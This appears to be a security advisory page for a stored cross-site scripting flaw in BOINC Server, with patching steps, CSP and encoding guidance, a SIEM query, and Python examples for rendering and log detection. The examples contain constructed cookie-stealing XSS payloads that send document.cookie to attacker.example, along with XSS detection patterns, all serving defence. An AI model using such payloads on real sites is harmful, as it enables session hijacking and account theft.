CVE-2025-0668

9.8 CRITICAL

📋 TL;DR

This CVE describes a stored cross-site scripting (XSS) vulnerability in BOINC Server: attacker-supplied input is saved by the server and later rendered, without proper output encoding, into web pages viewed by other users. The vulnerability affects BOINC Server versions before 1.4.5 and could enable attackers to steal session cookies, perform actions as authenticated users (including administrators), or deface project pages. Anyone running a vulnerable BOINC Server instance is affected.

💻 Affected Systems

Products:
  • BOINC Server
Versions: All versions before 1.4.5
Operating Systems: All platforms running BOINC Server
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the web interface component of BOINC Server, where user-supplied input is stored and later included in generated web pages without proper output encoding.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers could steal administrator credentials, take full control of the BOINC server, compromise user accounts, and potentially pivot to other systems in the network.

🟠 Likely Case

Attackers inject malicious JavaScript to steal session cookies, perform actions as authenticated users, or deface the BOINC web interface.

🟢 If Mitigated

With proper input validation and output encoding, the malicious scripts would be rendered harmless as text rather than executable code.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: No
Complexity: LOW

The CWE assigned to this record is CWE-89 (SQL Injection), while the description describes cross-site scripting. The references cited by the advisory discuss SQL injection vulnerabilities in BOINC, so this record may cover more than one vulnerability class; treat both injection types as in scope when prioritising the patch and when reviewing logs.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.4.5

Vendor Advisory: https://boinc.berkeley.edu/

Restart Required: Yes

Instructions:

1. Back up your BOINC Server configuration and data (including the project database).
2. Download BOINC Server version 1.4.5 or later from the official website.
3. Stop the BOINC Server services.
4. Install the updated version.
5. Restart the BOINC Server services.
6. Verify the installation by checking the version.

🔧 Temporary Workarounds

Implement Web Application Firewall (WAF) (platforms: all)

Deploy a WAF with XSS protection rules in front of the BOINC Server to block requests carrying script tags, event-handler attributes or javascript: URLs before they reach the application. Filters of this kind are bypassable (alternative encodings, unusual tag and attribute spellings), so treat them as a stopgap that reduces exposure, not as a fix.

Input Validation Filter (platforms: all)

Add input validation at the web server or reverse proxy level to reject requests whose parameters contain markup, and restrict who can reach the forms that accept user-supplied text. The same bypass caveat applies.

🧯 If You Can't Patch

  • Isolate the BOINC Server behind a reverse proxy with strict input validation and XSS filtering
  • Implement Content Security Policy (CSP) headers at the reverse proxy to restrict script execution sources; omit 'unsafe-inline' from script-src, otherwise injected inline event handlers still run
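An added example, not code from this advisory or from the BOINC project, illustrating the output-encoding point from the "If Mitigated" case above and the CSP mitigation in the list above. The payload string and the hostname attacker.example are constructed; the two rendering functions are hypothetical stand-ins for a page template (BOINC's web interface is PHP; this is Python so it can be run as-is), and the parser-based check shows what a browser would actually tokenize from each output.

```python
import html
from html.parser import HTMLParser

# Constructed payload of the kind a stored-XSS bug lets an attacker persist in a
# user-controlled field such as a display name. attacker.example is hypothetical.
MALICIOUS_NAME = "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"


def render_profile_unsafe(name: str) -> str:
    """Vulnerable pattern: untrusted input interpolated into HTML unchanged."""
    return f"<h2>User: {name}</h2>"


def render_profile_safe(name: str) -> str:
    """Hardened pattern: HTML-encode at the point of output, for the HTML-text context.
    html.escape turns < > & " ' into entities, so the payload is shown, not parsed."""
    return f"<h2>User: {html.escape(name, quote=True)}</h2>"


class _ActiveMarkupFinder(HTMLParser):
    """Flags a <script> element, an on* event-handler attribute, or a javascript:
    URL in href/src, as tokenized by an HTML parser (i.e. as a browser would see it)."""

    def __init__(self) -> None:
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found = True
        for attr, value in attrs:
            if attr.startswith("on"):
                self.found = True
            if attr in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.found = True


def active_markup_in(fragment: str) -> bool:
    """True if the rendered fragment still contains executable markup."""
    parser = _ActiveMarkupFinder()
    parser.feed(fragment)
    parser.close()
    return parser.found


def csp_header() -> tuple[str, str]:
    """Defence-in-depth header to set at the reverse proxy. Without 'unsafe-inline'
    in script-src, inline handlers like the onerror above do not execute even if an
    encoding mistake lets them into the page."""
    return (
        "Content-Security-Policy",
        "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'",
    )


if __name__ == "__main__":
    for label, render in (("unsafe", render_profile_unsafe), ("safe", render_profile_safe)):
        out = render(MALICIOUS_NAME)
        print(f"{label}: active markup = {active_markup_in(out)}")
        print("   ", out)
    print(": ".join(csp_header()))
```

Encoding belongs at output, chosen for the context the value lands in (HTML text here; attribute, URL and JavaScript contexts need their own encoders), not at input. If the BOINC pages rely on inline scripts, a script-src 'self' policy will break them; deploy it first as Content-Security-Policy-Report-Only to find out what it would block.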

🔍 How to Verify

Check if Vulnerable:

Determine the installed BOINC Server version; any version earlier than 1.4.5 is vulnerable.

Check Version:

Note that the 'boinc' (Linux) and 'boinc.exe' (Windows) executables are the BOINC client, not the server; 'boinc --version' reports the client version and says nothing about whether the server is patched. Check the version of the server package or source tree you actually deployed (the release tag or package version on the server host), or ask the project administrator.

Verify Fix Applied:

After patching, confirm the version is 1.4.5 or later. Then, in a test environment or with a dedicated test account, submit a harmless marker string containing angle brackets to the input fields and verify in the page source that it is rendered as literal text (entity-encoded) rather than as markup.

📡 Detection & Monitoring

Log Indicators:

  • Markup (tags, on* attributes, javascript: URLs) in stored user-controlled fields or in request parameters
  • An existing session used from a new source IP or user agent shortly after the user viewed a page containing injected markup (consistent with a stolen session cookie)
  • Multiple failed login attempts followed by a successful login from the same IP
  • Unexpected changes to web page content

Network Indicators:

  • HTTP requests containing suspicious script tags or JavaScript code in parameters
  • Unusual outbound connections from the BOINC server

SIEM Query:

source="boinc_server" AND (http_request="*<script*" OR http_request="*javascript:*" OR http_request="*onerror=*" OR http_request="*onload=*")

This query matches literal, undecoded strings. A payload sent URL-encoded (for example %3Cscript) will not match unless the pipeline decodes request fields before the comparison, and POST bodies do not appear in web access logs at all, so a stored payload submitted through a form may leave no trace in the request line.
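The detection logic above, carried further as an added example that is not part of this advisory or of BOINC: a Python script that parses constructed Apache combined-format access-log lines, URL-decodes the request target, applies the same indicators as the SIEM query, and shows two cases a literal substring match gets wrong (an encoded payload it misses and a harmless parameter name it flags). All IPs, paths and the attacker hostname are hypothetical.

```python
import re
import urllib.parse

# Constructed access-log lines (Apache "combined" format). Only lines 1 and 3 carry
# payloads; line 5 has a query parameter that merely happens to be named "onload".
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2025:12:00:01 +0000] "GET /user_profile.php?name=%3Cscript%3Edocument.location%3D%27http%3A//attacker.example/%3F%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2025:12:00:02 +0000] "GET /user_profile.php?name=alice HTTP/1.1" 200 1401 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2025:12:00:03 +0000] "GET /search.php?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 900 "-" "curl/8.0"
203.0.113.9 - - [10/Mar/2025:12:00:04 +0000] "GET /team.php?teamid=42 HTTP/1.1" 200 2000 "-" "Mozilla/5.0"
192.0.2.4 - - [10/Mar/2025:12:00:05 +0000] "GET /show_user.php?userid=7&onload=1 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Fields of the combined log format we need: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Same indicators as the SIEM query, but as patterns applied to the *decoded* target.
# The event-handler rule requires the on*= to sit inside a tag, which avoids flagging
# ordinary parameters whose names start with "on".
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I),
    re.compile(r"javascript\s*:", re.I),
]


def decode_target(target: str, rounds: int = 2) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads like %253C are seen."""
    prev = target
    for _ in range(rounds):
        cur = urllib.parse.unquote_plus(prev)
        if cur == prev:
            break
        prev = cur
    return prev


def naive_match(line: str) -> bool:
    """Literal substring match on the raw line, as the SIEM query above behaves."""
    lowered = line.lower()
    return any(tok in lowered for tok in ("<script", "javascript:", "onerror=", "onload="))


def find_xss_requests(log_text: str) -> list[dict]:
    """Return one record per request whose decoded target matches an XSS indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line; skip rather than crash
        decoded = decode_target(m["target"])
        rules = [p.pattern for p in XSS_PATTERNS if p.search(decoded)]
        if rules:
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "target": decoded, "rules": rules})
    return hits


if __name__ == "__main__":
    for line, flagged in zip(SAMPLE_LOG.splitlines(), map(naive_match, SAMPLE_LOG.splitlines())):
        print(f"literal match: {flagged!s:5}  {line[:70]}")
    for hit in find_xss_requests(SAMPLE_LOG):
        print(f"decoded hit: {hit['ip']} {hit['ts']} {hit['method']} {hit['target']}")
```

The literal match flags only the benign line 5 and misses both real payloads, because the indicators arrive percent-encoded; the decoded match catches lines 1 and 3 and ignores line 5. The access log still never shows POST bodies, so this complements, rather than replaces, inspection of the stored fields themselves.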
